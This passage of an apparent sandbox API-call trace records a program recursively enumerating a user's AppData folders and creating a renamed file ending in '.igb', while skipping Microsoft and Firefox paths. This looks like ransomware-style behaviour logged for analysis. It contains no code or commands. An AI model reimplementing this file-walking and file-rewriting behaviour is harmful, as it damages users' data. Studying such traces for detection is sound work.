lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb072d8 [0057.329] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.329] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.329] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.329] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.329] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.329] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.330] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.330] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.330] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0057.330] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0057.330] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb072d8 [0057.330] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.330] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.330] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.331] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.331] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.331] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.331] PathMatchSpecW (pszFile="OneDrive.lnk", pszSpec="*") returned 1 [0057.331] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.331] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0057.331] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0057.331] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb072d8 [0057.332] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.332] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.332] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.332] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.332] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.332] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.332] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="System Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools" [0057.333] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*" [0057.333] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb072d8 [0057.333] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.333] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.333] PathMatchSpecW (pszFile="Command Prompt.lnk", pszSpec="*") returned 1 [0057.333] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.333] PathMatchSpecW (pszFile="computer.lnk", pszSpec="*") returned 1 [0057.333] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.334] PathMatchSpecW (pszFile="Control Panel.lnk", pszSpec="*") returned 1 [0057.334] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.334] PathMatchSpecW (pszFile="Default Apps.lnk", pszSpec="*") returned 1 [0057.334] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.334] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.334] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.334] PathMatchSpecW (pszFile="Devices.lnk", pszSpec="*") returned 1 [0057.334] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.334] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0057.334] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.334] PathMatchSpecW (pszFile="Run.lnk", pszSpec="*") returned 1 [0057.335] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.335] PathMatchSpecW (pszFile="Windows Defender.lnk", pszSpec="*") returned 1 [0057.335] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.335] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.335] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.335] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Windows PowerShell" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell" [0057.335] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*" [0057.335] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07558 [0057.336] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.336] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.336] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.336] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.336] PathMatchSpecW (pszFile="Windows PowerShell (x86).lnk", pszSpec="*") returned 1 [0057.336] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.336] PathMatchSpecW (pszFile="Windows PowerShell ISE (x86).lnk", pszSpec="*") returned 1 [0057.336] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.336] PathMatchSpecW (pszFile="Windows PowerShell ISE.lnk", pszSpec="*") returned 1 [0057.337] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.337] PathMatchSpecW (pszFile="Windows PowerShell.lnk", pszSpec="*") returned 1 [0057.388] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.388] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.389] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.389] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.389] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.389] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.389] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.389] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0057.389] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0057.390] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb072d8 [0057.390] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.390] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.390] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.390] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.390] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0057.390] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0057.390] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.391] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.391] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.391] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="CachedFiles" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles" [0057.391] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*" [0057.391] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.391] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.391] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.391] PathMatchSpecW (pszFile="CachedImage_1440_900_POS4.jpg", pszSpec="*") returned 1 [0057.391] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.391] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.391] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.392] PathMatchSpecW (pszFile="TranscodedWallpaper", pszSpec="*") returned 1 [0057.392] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.392] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.392] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.392] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.392] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.392] FindClose (in: hFindFile=0xb07358 | out: hFindFile=0xb07358) returned 1 [0057.393] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.393] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0057.393] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0057.393] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07158 [0057.393] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.393] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.394] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0057.394] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0057.394] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.394] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.394] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.394] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0057.394] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0057.394] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.394] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.395] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.395] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.395] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.395] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.395] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.395] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.395] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0 [0057.396] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.396] PathFindExtensionW (pszPath="Desktop (create shortcut).DeskLink") returned=".DeskLink" [0057.396] PathCombineW (in: pszDest=0x9af298, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="Desktop (create shortcut).igb" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" [0057.396] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x15e89c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0057.399] CloseHandle (hObject=0x210) returned 1 [0057.399] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0 [0057.400] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0057.400] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0057.400] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0057.400] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0xb070d8 [0057.400] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.400] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.400] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0057.400] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0 [0057.401] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0057.401] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0057.401] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0057.401] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb07158 [0057.401] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.401] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.401] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0057.401] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0057.402] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0057.402] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0057.402] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0057.402] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb072d8 [0057.402] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.402] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.403] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.403] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.403] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0057.403] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 1 [0057.403] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="microsoft") returned 0x0 [0057.404] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="firefox") returned 0x0 [0057.404] PathCombineW (in: pszDest=0x9ad4e0, 